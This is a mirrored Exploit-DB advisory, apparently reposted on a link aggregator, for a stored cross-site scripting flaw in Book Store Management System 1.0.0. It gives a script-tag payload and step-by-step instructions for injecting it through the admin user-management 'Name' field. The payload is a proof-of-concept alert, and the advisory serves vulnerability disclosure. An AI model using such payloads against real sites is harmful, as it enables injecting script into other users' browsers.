6

[webapps] Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)

 2 years ago
source link: https://www.exploit-db.com/exploits/51123
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)

EDB-ID:

51123

EDB Verified:

Platform:

PHP

Date:

2023-03-29

Vulnerable App:

# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)
# Date: 2022-11-08
# Exploit Author: Rajeshwar Singh
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip
# Tested on: Windows/XAMPP
###########################################################################

Payload use = "><script>alert("XSS")</script>

1. Visit URL http://localhost/bsms_ci/
2. login with admin Credentials 
3. navigate to user Management
4. Click on "Add New System User"
5. Add  payload in "Name" input field 
6. Click save.
7. Visit http://localhost/bsms_ci/index.php/user
8. XSS payload execute.

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK